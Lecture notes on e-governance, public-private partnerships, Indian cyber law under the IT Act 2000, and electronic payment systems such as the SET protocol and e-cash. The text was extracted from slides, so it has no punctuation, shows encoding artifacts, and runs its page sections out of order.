minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 7
7
Processing a Credit cards payment ndash
Risk in using Credit cards -
Operational Risk
Credit Risk
Legal Risk
Secure Electronic Transaction (SET) Protocol
Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM
GTE SAIC and others
Designed to provide security for card payments as they travel on the Internet
Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers
and merchants in addition to providing secure transmission
SET specification
Uses public key cryptography and digital certificates for validating both
consumers and merchants
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
